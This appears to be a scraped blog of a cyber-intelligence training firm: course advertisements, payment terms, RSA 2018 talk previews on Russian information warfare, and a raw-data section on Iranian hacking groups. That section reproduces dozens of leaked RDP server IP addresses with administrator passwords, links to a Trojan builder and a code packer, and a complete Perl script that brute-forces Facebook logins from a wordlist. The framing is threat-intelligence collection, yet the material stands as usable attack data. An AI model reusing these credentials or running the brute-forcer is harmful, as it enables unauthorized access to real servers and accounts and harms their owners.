Singapore – Cyber Intelligence Training

Cyber Intel – Brochure and Signup

Cheque: make payable to :
MaitreAllianz PteLtd
Mail to: 3 Queen’s Road, #10-163, Singapore 260003
Bank Transfer: MaitreAllianz PteLtd
United Overseas Bank Limited,
RochorRoad Branch
Account No: 147-3020-918
Swift Code: UOVBSGSG

Payment must be made in Singapore Dollars.
Payment is required within 5 working days on receipt of invoice.
Bookings received less than 14 working days –cash payment only
SUBSTITUTION, CANCELLATION, NO-SHOW, POSTPONEMENT POLICIES, CONTACT DETAILS, and EVENT CONFIRMATION
SUBSTITUTION is allowed up to 7 days before day of event. AdminCharge of S30.00 is required for substitution request received with less than 7 days advance notice.
CANCELLATION must be made in writing. Refunds are computed based on the date of receiving your notice.
Full Refund –28 days or more prior to the event
75% -21 to 27 days notice
50% -20 to 14 days notice
25% -7 to 13 days notice
NO REFUND or credit for 6 days or less notice
NO SHOW, Sick Leave, Urgent BusinessCallor Absent for any reason-the full course fee is due.
If we CANCEL or POSTPONE the event, full refund will be given.
FORCE MAJEURE CLAUSE: We shall assume no liability whatsoever if this event is altered, rescheduled, postponed or canceled due to a fortuitous event, unforeseen occurrence, or any other event that renders performance of this event inadvisable, illegal, impractical or impossible. For purpose of this clause, a fortuitous event shall include but not limited to: an Acts of God; governmental restrictions and / or regulations; war or apparent act of war; terrorism or apparent act of terrorism; disaster; civil disorder, disturbance and / or riots; curtailment, suspension, and/or restriction on transport facilities / means of transportation; any other emergency.
YOUR DETAILS: All details required for registration are mandatory. If you found errors, kindly notify us.
SPEAKER CHANGES: Speakers and topics were confirmed at the time of publishing, however, circumstances beyond the control of the organizers may necessitate substitution, alterations or cancellation of the speakers and/or topics. As such, we reserve the right to alter or modify the advertised speakers and/or topics if necessary. Any substitution or alteration will be reflected on our web page as soon as possible. All delegates or their representative will also be notified as soon as the changes are made.
Tel: 6100 0621
http://www.maitreallianz.com

Course Brochure and Signup

Deception, Distortion, Dishonesty: The Real Story Behind the Hype – RSA Conference 2018 – San Francisco

Dr. Khatuna Mshvidobadze

In the summer of 2008, Russia attacked Georgia in the first-ever combined kinetic and cyberwar. Sure, the 1990-1991 Gulf War was dubbed the first information war—the use 226571794ecbc84a4232f3e9a42a7041-480x270of information in war is not new. What was new in 2008 was that Russia employed its cyber arm as an independent operational capability alongside its land, sea and air forces. The targets were critical infrastructure. The strategic objectives were to sap Georgia’s will to resist and to provide cover for Russia’s information campaign to deceive the west into believing that somehow little Georgia was the aggressor.

Operational security was paramount—Moscow had to keep everyone confounded about who was behind the cyber attacks. Just like the kinetic invasion, the cyber attacks were long and well-planned, but Russia did a great job covering its tracks. When the shooting stopped, well-meaning researchers investigated what had happened. However, coming from a profession that focuses on computer screens and a culture unaccustomed to the 2018-04-11_9-18-09kind of deception that is part of everyday Russian life, they foundered.

The attacks led us to Russia. We noted uncanny timing. Western experts were indeed confounded when the trail led to kids and criminals. I have been following that trail ever since. Insight into Russia, all-source intelligence and a keen understanding of denial and deception were needed.

Today, saying that the Russian state employs a network of cybercriminals to do its online dirty work is commonplace. One might just as well pretend not to know the identity of those little green men who seized Crimea. But when I started saying it in 2010, you would not believe the resistance I encountered.

Soon after, I met Jeff Bardin, my professor at Utica College, who became mentor and friend. Jeff brings an extraordinary expertise in all-source intelligence and the ways of denial and deception. At this year’s RSA Conference, it is my privilege to combine with him in a talk entitled Deception, Distortion, Dishonesty: The Real Story Behind the Hype.

Jeff will lead off, analyzing the types of D&D, its various dimensions and some tactics that can be employed online and offline. The planners, he will say, must have clear reasons for utilizing D&D based on their goals. They must define the strategic, operational and tactical goals of deception and the criteria for success.

I will point out that Russians do not see cyber warfare as distinct but regard it as just one tool of information war. Look at 2008. The cyber attacks aimed at hampering the Georgian government’s ability to communicate while Moscow’s propaganda machine painted Russia as the aggrieved party. “Information space opens wide asymmetrical possibilities for reducing the fighting potential of an enemy,” writes Valery Vasilyevich Gerasimov, Chief of the Russian General Staff. It’s a remarkable statement, but nothing new—Russian thinking on information warfare has been consistent since the 1980s.

Now, the Kremlin commands a vast network of online intelligence agencies, scientific organizations, academic institutions, criminals, and trolls. We’ll discuss how Russia deals with enemies, foreign and domestic, cyber players and organization, the growing role of the military, tactics, techniques, procedures and tools, vectors, false flags, troll factories and more. Come join us on Wednesday at the RSA Conference.

KM

Coincidences Take A Lot of Planning – RSA Conference 2018 – San Francisco

The RSA Conference is soon upon us! The expectation to see old friends and make new rsa1800008-buckle-up_augacquaintances. The show will once again be great with new technologies displayed, new ideas bantered about, and phrases around AI used inappropriately and about 5-10 years too soon. The parties will crank at night and many will suffer the cocktail flu come the next morning. 40,000 strong is the estimated number for this event! Huge!

کنفرانس RSA 2018  rsa-конференция 2018  2018 RSA 회의  rsa 2018年会议  مؤتمر rsa 2018

But what of the undercurrent that occurs unmentioned every year? Just beneath the surface are a series of activities generated by scores of foreign agents looking to steal information, intellectual property, or gain an upper hand over someone of importance being caught doing illicit things. How many spies will blanket the city and the shop floor armed with various technologies used to extract information? Cyber and physical espionage activities run amuck at such events. This is common and expected. How will you know when your data is being pilfered? Will your hotel room be secure? Are your 2018-04-05_14-43-31mobile devices secure? What data have you given up already? Flight plans, hotel information, email addresses, phone numbers, social media data, car rental information, events you will attend, arrival and departure times, restaurant reservations, meeting information… Do you think your data is not in the wind already? Will a chance encounter lead to unexpected information sharing? Is the person next to you at the bar there just by coincidence?

All questions you should consider. All questions that are usually forgotten or ignored.

BEHIND ALL COINCIDENCES THERE IS A PLAN, AND BEHIND ALL PLANS THERE IS A COINCIDENCE – Malnar

I12149464887

Online – Cyber Intelligence Tradecraft Certification – April 28, 2018

 

This 8-week online course begins on Saturday April 28, 2018 at 5PM US Mountain Time ending on Saturday June 23, 2018 at 5PM US Mountain Time.
http://www.planetreg.com/T71ONLINETRAINING
The online courses are instructor video and audio recorded with periodic direct interaction with the instructor via online web meetings. The instructor will have standard office time for question and answer as well as regular access via class email and other messaging options.

Validated and registered students will receive login and preparation information 1 week prior to class start. Prospective students must send an email to osint@treadstone71.com from a corporate account to validate course eligibility before registration. (Corporate accounts are not Gmail, Hotmail, Yahoo, Mail, Hushmail, Protonmail, and the like). Treadstone 71 reserves the right to restrict course registration based upon certain risk factors. 

http://www.prweb.com/releases/2018/02/prweb15246819.htm

Latest student testimonial:
“With my extensive experience working in the Department of Defense on active duty and federal contractor, this training provided industry professionals with a greater perspective for intelligence analysis. The training taught state of the art concepts and applied them to real world scenarios establishing a solid understanding on utilizing these intelligence tradecrafts to effectively predict and prevent cyber actors from exploiting their organizations. Individuals new to the cyber intelligence field or professionals who want to fine tune their skills in the intelligence field should strongly consider this training for any intelligence analyst or security professional.”

Program Outline 

http://www.planetreg.com/T71ONLINETRAINING

  • CYBINT1 – Anonymity and Passive Persona setup, Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT,TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy (Case Study 1)
  • CYBINT2 – Organization, Production, and Structured Analytic Techniques, Adversary Denial and Deception, Use of Techniques, Types of evidence, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates (Case Study 2)
  • CYBINT3 – Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypothesis, Flow into Hunt, Detect, CSIRT,TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience (Case Study 3)
  • CYBINT4 – Case Study 4, Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Cyber and Threat Intelligence Program Strategic Plan, Goals, Objectives. Case Study Presentations
    Lecture, Hands-on, Apprenticeship,in class exercises, student presentations, analytic products, templates, course material—40 CPEsAll Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

http://www.planetreg.com/T71ONLINETRAINING


All students receive 3 books and 50 plus course documents, VPN, and other course material. 
Students who complete the course will be certified as Cyber Intelligence Tradecraft Professional. 40 CPEs awarded for the course. This course is highly specialized following intelligence community tradecraft. You won’t get this at SANS. You won’t get this anywhere but from Treadstone 71. If you want purely technical, then this is not the course for you. If you want tradecraft that lays the foundation for a solid program, education that creates a lasting impact, then this is the course for you.

Course books and manuals will be provided to students upon accepted enrollment. This course follows traditional intelligence community tradecraft. Treadstone 71 has been teaching cyber intelligence courses in various forms for six years. From academic settings and corporate environments to government facilities. Our customers include some of the largest firms in the world many of whom are part of critical infrastructures recognizing the need to learn how to create intelligence (www.treadstone71.com). We support our training with onsite consulting services that teach you how to create a sustainable program aligned to stakeholders. Ultimately, we teach you what most vendors cannot or will not – how to fish for yourself.

Course Fee, Course Lab, and Materials Fee (includes books, templates, structured techniques application, etc.).

This course combines lecture, research, and hands-on team assignments. Students are best served using a PC but a MAC will do (a virtual machine running windows on the Mac is best if you only have a Mac).

How is this course different from the current Treadstone 71 Cyber Intelligence course?

This course provides definitive sections along the intelligence lifecycle that are in-depth. Students are required to demonstrate understanding and use of collection methods using defined targets and target case studies, understanding and applying analytic techniques, when and how to use analytic techniques and analytic types. Students are presented case studies for analysis, required to use tradecraft methods, and provide written reports in standard analytic format. Students are also required to orally present their deliverables to the class. You will leave this course with the tools, methods, and understanding necessary to enhance your intelligence program.

“The Cyber Intelligence Training delivered and created by Jeff Bardin will add rapid returns to both Cyber Intel Analysts, and your Security Operations.  This very thorough class adequately prepares the student for your Cyber Intelligence function.  This class starts with the history of intelligence as a tradecraft and the evolution to the digital corporate world.   Along the way, each student receives quality instruction and hands-on experience with today’s OSINT tools.  This is necessary for anyone new to Cyber Intelligence and complimentary to any Security Operations within your enterprise. This class provides the student with the resources and fundamentals needed to establish cyber intelligence as a force as both a proactive offensive step and a counter intelligence-contributing arm of your larger team.”

“The class was very detail orientated with a strong focus on the work of Cyber threats and how to better secure your assets against potential attacks.  For most scenarios, we went through he had an open source tool, or the link to a paid version, to monitor or prevent the attacks from occurring.  He was able to answer each and every question asked with specific details, and then some.  I would sign up again right away for any other classes offered by Jeff.”

“Fantastic class that gets to the foundational aspects of traditional tradecraft. We studied hard examining recent attack campaigns. The analysis training prepared me forreal world efforts. Have to say this is one of the best classes I have ever taken having taken many from SANS.  SANS does not compare. They are more of a class mill today.  The Treadstone 71 course material is unique, focused, and timely.”

“The Cyber Intelligence training offered by Treadstone71 is definitely an outstanding course and I recommend it for any organization looking to implement an intelligence capability. Jeff Bardin is extremely knowledgeable in the intelligence tradecraft and applies it to the cyber realm in a way that is understandable, exciting to learn and makes it easy to achieve “quick wins” in the organization after completing his class.  Jeff provided the class with a multitude of tools, templates, and documents that can immediately be used by any organization focused on intelligence collection and analysis. Jeff arrived well prepared to teach the course and one of the most impressive aspects of the class was that he presented the material in a way that displayed his personal knowledge and experience in the field rather than relying solely on book material.  We intend to continue leveraging Jeff’s services as we mature our cyber intelligence capability and highly recommend Treadstone71’s services to any organization.”

“This is one of the best, if not the best, Cyber Threat Intelligence training course I’ve attended.”

“This course was excellent. I was concerned coming into it that I would already know all the course material (I have been doing this sort of work for 15 years, specifically the type of work this course covered). As it turns out, it was a good reminder of what I should be doing to improve structure and rigor, and provided good tools, some of which I had not seen before. If I was new to this field or looking for a good insight into how Intelligence should work (i.e.: most of the rest of the class), I believe this would have provided even more value. I have already recommended it to a couple of my former colleagues in this line of business and would happily recommend it for future use by ########.”

Course material is not for resale or commercial use outside the end user license agreement. Course material may not be used for competitive purposes.

NOTE: Organizations sending 3 or more students are eligible for other discounts. Contact Treadstone 71 at osint@treadstone71.com for more information.

NOTE: CORPORATE PURCHASE ORDERS can be arranged. Please contact us at osint@treadstone71.com to begin the process. Payment must be received prior to course start.

You must attend the full class in order to gain access course material and the certification. Certification is granted after completion of course instruction and hands-on application of the concepts in 3 to 4 team exercises. If a student leaves the class prior to course completion, neither the certification is granted nor is the course material covered after the student leaves made available.  Lectures and associated materials posted each day after each lecture. This method supports the student in a just-in-time manner. This method ensures full understanding of the material without discovering course plot lines until the proper time. The course is architected to support a particular process flow and learning method.

Submitting your registration means you agree to the course EULA and all that it entails. Couse EULA
Treadstone 71 reserves the right to cancel the course should we not receive enough registrations.

 www.planetreg.com/T71ONLINETRAINING
 
Registration     Pay by April 15, 2018

Pay by April 15, 2018  $4,499.00

Cyber Intelligence Tradecraft Certification

  • Online, Instructor-Led
    niccs

This course provides tradecraft training along the intelligence lifecycle including collection methods, techniques, planning, PIRs, and collection tools and targeting. Intelligence production methods and process flows are covered as well as evidence credibility, reliability, denial and deception, and confidence levels.

Students are required to demonstrate understanding and use structured analytic techniques as well as various types of analysis including synthesis and fusion of data and information into actionable intelligence. The class covers methods of adapting TTPs and IoCs for hunt and detect and interfaces to incident response.

The course includes case studies covering adversary campaign research and analysis, historical trending, and passive adversary collection. Students will be instructed in applying analytic techniques, when and how to use analytic techniques and analytic types. Students are presented several case studies for analysis, required to use tradecraft methods, and provide written reports in standard analytic format will dissemination the reports to stakeholders.

5 day instructor led in person (NOTE: the NICCS site may not be up-to-date)

Learning Objectives

  1. Develop skills in Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT, TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy.
  2. Learn Organization, Production, and Structured Analytic Techniques, Use of Techniques, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates.
  3. Define Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypothesis, SOPs, Flow into Hunt, Detect, CSIRT, TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience.
  4. Participate in and demonstrate how to Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Argument Mapping.

This course follows the International Association for Intelligence Education Standards for Intelligence Analyst Initial Training.

I. Introduction to Intelligence
II. Critical Thinking
III. Analytic Writing
IV. Creative Thinking
V. Analytic Briefing
VI. Structured Analytic Techniques.
VII. Analytic Issues
VIII. Argument Mapping
IX. Case Studies

Framework Connections

  • Icon that says Analyze with a chart graph depicted
  • Icon that says Collect and Operate with database server depicted
  • Icon that says Oversee and Govern with a magnify glass depicted.

Africa – Where Counter-Terrorism and Modernization Meet

One more fascinating/outstanding effort by the new Kansas State Dragon Team. This time we researched the major powers’ use of Drones on bicoastal AOs in Africa. Many interesting conclusions and lots of resources involved. The false flag is counter-terrorism. The real agenda is resources: gold, diamonds, cotton. China continues it “Take and Talk strategy” in Africa and the Spratly Islands back in its home territory of the South China Seas.

We next intend to look at China’s interference with India and Pakistan. The next war will be by Drone proxy – as predicted. Too much UAS  investment by so many big players to leave them dormant.   Or it might be very subtle like disruption of GPS communications or replay of navigation bridge signals on US  naval assets.

REPORT in PDF HERE

  • Team Dragon
  • Kansas State University

ksu

Confuser and Oilrig – Iranian Hacks

This is a bit disjointed at this time and is raw data. This is not intelligence, has not been analyzed but does tie directly to Oilrig.

A powerful program to pack your apps. With this program, you can pack programs in C # and VB.Net

Confuser – Confuser program zipped. For download and analysis

a1ir3z4-HK Frequently found on anonysec.org, c-cracking.org, formerly of the Kalli Hack Team (kallihack), http://haraji.8tag.ir

Others in the mix: XVII_Hacker, #XVII_Roman & #BlackErroR1 & #sorblack

BTC BRUTER v.3.0 By UNKNOWN-KILLER

Bitcoin Cracker Performance Test via Telegram: @ a1ir3z4HK @ a1ir3z4_HK_bot
Using temp emails here: http://www.emeil.ir/
Sprinkle the effort with a bit of Russian for flavoring

Cʏʙᴇʀ Cʀᴀᴄᴋɪɴɢ | سایبر کرکینگ

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

182.71.201.2:3389@TECHNOPAK\administrator;p@ssw0rd
150.242.254.98:3389@WINWORLD\administrator;Pass@word1
115.112.155.95:3389@APOLLOHOSPITALS\administrator;P@ssw0rd
221.135.143.132:3389@DMSSERVER\administrator;P@ssw0rd
220.225.210.91:3389@CTL\administrator;P@ssw0rd
45.64.195.147:3389@UNISRV\administrator;P@ssw0rd
125.22.73.198:3389@NAVGGL\administrator;P@ssw0rd
125.22.73.196:3389@NAVGGL\administrator;P@ssw0rd
59.144.162.8:3389@DELLSERVER\administrator;Admin@123
27.54.170.204:3389@DCPLHO\administrator;Admin@123
180.151.71.42:3389@FOURDTECH\administrator;Admin@123
202.47.116.201:3389@JAYAIR\administrator;Admin@123
118.185.53.18:3389@JBBROTHERS\administrator;Admin@123
27.251.117.6:3389@WIN-6T4QFMCPVE8\administrator;Admin123
103.230.152.172:3389@WIN-PMCSC1KVLPH\administrator;admin@123
219.65.58.58:3389@BIOTECH\administrator;admin@123
124.123.99.31:3389@WIN-RJTS2DUSFC1\administrator;admin@123
122.15.47.237:3389@ADMINISTRATOR\administrator;admin@123
125.63.94.107:3389@LAT039010002\administrator;admin@123
103.50.152.53:3389@BIOTECH\administrator;admin@123
117.252.2.69:3389@ADMINISTRATOR\administrator;admin@123
119.226.187.124:3389@WINDOWS-LJLRPML\administrator;admin@123
125.21.48.42:3389@WINDOWS-LJLRPML\administrator;admin@123
223.30.104.27:3389@WIN-ANRHQC2VF3Q\administrator;admin@123
125.20.83.199:3389@DSKE-1\administrator;admin@123
223.30.126.218:3389@CKHO\administrator;admin@123
59.90.244.200:3389@TEEPARAM-SERVER\administrator;Passw0rd1
14.102.15.38:3389@LAB01\administrator;password@123
124.124.70.194:3389@BRIGADEGROUP\administrator;password@123
220.227.9.77:3389@SCINDIASCHOOL\administrator;password@123
122.200.19.58:3389@ASHTE-RFID\administrator;P@ssw0rd@123
61.12.1.3:3389@WINDOWS-CYMSTZH\administrator;password@1234
182.74.185.140:3389@BIBAAPPARELS\administrator;abc@123
180.211.99.2:3389@GCPL\administrator;
112.196.8.202:3389@LIBRARYSERVER\administrator;
118.185.4.242:3389@SRI01\administrator;
Capture
Beast Trojan Builder – (change to .rar to unzip) Use at own risk.
57c4d9a0-63da-46d3-9e16-b720d27b0f6a

Iranian Hacking – Saudi Sites – Bruteforcing facebook zhacker

Music is horrendous – be warned

 

 

and the script:

#!/usr/bin/perl
#

use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

system(‘clear’);
print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;37m Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n”;
print “\033[1;31m ======================================================\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die “\n[-] Can’t find/open $wordlist\n”;

 

print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;33m made by [[Z hacker]] \n”;
print “\033[1;31m ========================================================\n”;

print “\033[1;39m\n [+] Cracking Started on: $user …\n\n”;
print “=======================================\n”;

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf “%%%0x”, ord $1 /eg;

my $a = “POST /login.php HTTP/1.1”;
my $b = “Host: http://www.facebook.com”;
my $c = “Connection: close”;
my $e = “Cache-Control: max-age=0”;
my $f = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
my $g = “Origin: https://www.facebook.com&#8221;;
my $h = “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31”;
my $i = “Content-Type: application/x-www-form-urlencoded”;
my $j = “Accept-Encoding: gzip,deflate,sdch”;
my $k = “Accept-Language: en-US,en;q=0.8”;
my $l = “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3”;

my $cookie = “cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa”;
my $post = “lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In”;
my $cl = length($post);
my $d = “Content-Length: $cl”;

 

my ($host, $port) = (“www.facebook.com”, 443);

tie(*SSL, “Net::SSLeay::Handle”, $host, $port);

print SSL “$a\n”;
print SSL “$b\n”;
print SSL “$c\n”;
print SSL “$d\n”;
print SSL “$e\n”;
print SSL “$f\n”;
print SSL “$g\n”;
print SSL “$h\n”;
print SSL “$i\n”;
print SSL “$j\n”;
print SSL “$k\n”;
print SSL “$l\n”;
print SSL “$cookie\n\n”;

print SSL “$post\n”;

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
}
}
if (!defined $success)
{
print “\033[1;31m[-] $password -> Failed \n”;
close SSL;
}
else
{
print “\033[1;32m\n########################################################\n”;
print “[+] \033[1;32mPassword Cracked: $password\n”;
print “\033[1;32m########################################################\n\n”;
close SSL;
exit;
}
}

Rinlogger Teaching

 

Blog at WordPress.com.

Up ↑

%d bloggers like this: